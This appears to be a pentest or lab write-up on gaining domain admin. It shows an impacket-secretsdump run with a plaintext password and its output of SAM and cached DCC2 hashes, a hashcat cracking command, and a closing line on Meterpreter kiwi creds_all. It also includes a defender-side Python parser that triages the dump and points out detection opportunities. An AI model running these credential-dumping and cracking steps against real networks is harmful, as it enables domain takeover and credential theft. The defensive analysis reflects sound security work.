Getting domain admin

To get domain admin in an environment we can use a few techniques. One of them is secretsdump.

$ sudo impacket-secretsdump orionscorp2/rlourdes:'georgeorwell1984'@172.16.1.253
[sudo] password for user: 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x290e93b533730c6145eca1522ed0439a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f6ff1bd688b85e836aa2b7d6bb60bdcd:::
Usuario:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
ORIONSCORP2.LOCAL/thenrique:$DCC2$10240#thenrique#bffd65356630d9a479f8e6761f56393d
ORIONSCORP2.LOCAL/rlourdes:$DCC2$10240#rlourdes#44678d854a9acf5af8e6ea2a802eabb2

The "DCC2" prefix in the hash means Domain Cached Credentials (version 2), the cached domain logons kept on the host.

We can crack it with hashcat.

$ cat hashdomain
$DCC2$10240#thenrique#bffd65356630d9a479f8e6761f56393d

$ hashcat -m 2100 hashdomain /usr/share/wordlists/rockyou.txt --force
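The secretsdump output above has a fixed shape (SAM lines as `user:rid:lmhash:nthash:::`, cached logons as `DOMAIN/user:$DCC2$<iterations>#<user>#<hash>`), which makes it easy to triage from the defender's side. The following parser is an added example, not code from impacket or from the original write-up: it reads that output, flags local accounts whose NT hash is the well-known hash of an empty password, lists which domain users have cached logons on the host, and notes that the tool had to enable and start the RemoteRegistry service. The sample input is the output reproduced from this page; the two empty-hash constants are the standard LM/NT hashes of an empty string.

```python
"""Triage impacket-secretsdump output from a defender's side.

Example code added for this page, not part of impacket or the original
write-up. SAMPLE_OUTPUT is the tool output reproduced from the page; the two
empty-hash constants are the well-known LM/NT hashes of an empty password.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""

# Sample input: secretsdump output lines reproduced from this page.
SAMPLE_OUTPUT = """\
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f6ff1bd688b85e836aa2b7d6bb60bdcd:::
Usuario:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
ORIONSCORP2.LOCAL/thenrique:$DCC2$10240#thenrique#bffd65356630d9a479f8e6761f56393d
ORIONSCORP2.LOCAL/rlourdes:$DCC2$10240#rlourdes#44678d854a9acf5af8e6ea2a802eabb2
"""

SAM_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)
# secretsdump prints "DOMAIN/user:$DCC2$<iterations>#<user>#<hash>"; the bare
# "$DCC2$..." form (as saved into the hashcat input file) is accepted as well.
DCC2_RE = re.compile(
    r"^(?:(?P<domain>[^/\s]+)/[^:\s]+:)?"
    r"\$DCC2\$(?P<iterations>\d+)#(?P<user>[^#]+)#(?P<hash>[0-9a-f]{32})$"
)
# Status lines about services the tool touched on the target.
SERVICE_RE = re.compile(r"^\[\*\] (?:Service|Starting service) (?P<svc>\S+)")


def parse_sam_line(line: str) -> Optional[Dict[str, object]]:
    """Return a dict for a SAM hash line, or None if the line is not one."""
    m = SAM_RE.match(line)
    if not m:
        return None
    return {"user": m["user"], "rid": int(m["rid"]), "lm": m["lm"], "nt": m["nt"]}


def parse_dcc2_line(line: str) -> Optional[Dict[str, object]]:
    """Return a dict for a DCC2 cached-logon line, or None if it is not one."""
    m = DCC2_RE.match(line)
    if not m:
        return None
    return {"domain": m["domain"], "user": m["user"],
            "iterations": int(m["iterations"]), "hash": m["hash"]}


def parse_secretsdump(text: str) -> Tuple[List[dict], List[dict], Set[str]]:
    """Split tool output into SAM accounts, cached domain logons, touched services."""
    sam, cached, services = [], [], set()
    for raw in text.splitlines():
        line = raw.strip()
        if (acct := parse_sam_line(line)) is not None:
            sam.append(acct)
        elif (cred := parse_dcc2_line(line)) is not None:
            cached.append(cred)
        elif (m := SERVICE_RE.match(line)) is not None:
            services.add(m["svc"])
    return sam, cached, services


def audit(text: str) -> List[str]:
    """Produce one finding per item a defender should follow up on."""
    findings = []
    sam, cached, services = parse_secretsdump(text)
    for acct in sam:
        # Empty NT hash: the account has no password. Built-in accounts are
        # often disabled, so confirm the account state before raising an alarm.
        if acct["nt"] == EMPTY_NT:
            findings.append(
                f"local account {acct['user']} (RID {acct['rid']}) has an empty "
                "password; confirm it is disabled, otherwise set a password"
            )
    for cred in cached:
        who = f"{cred['domain']}\\{cred['user']}" if cred["domain"] else cred["user"]
        findings.append(
            f"cached domain logon for {who} ({cred['iterations']} PBKDF2 iterations) "
            "can be attacked offline; review CachedLogonsCount on this host"
        )
    for svc in sorted(services):
        findings.append(
            f"the dump enabled/started service {svc}; service state changes are "
            "recorded by the Service Control Manager and can be alerted on"
        )
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_OUTPUT):
        print("-", finding)
```

Two points worth noticing in the output: WDAGUtilityAccount is the only local account with a real password hash, and the cached DCC2 entries exist only because domain users logged on interactively to this host; the number of logons Windows keeps is controlled by the CachedLogonsCount value under the Winlogon registry key. The RemoteRegistry change that secretsdump performs is also a detection opportunity, since the System log records both the start-type change and the service entering the running state.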

Another way is to use psexec and, in the resulting Meterpreter session, load the kiwi module with load kiwi and run the creds_all command.
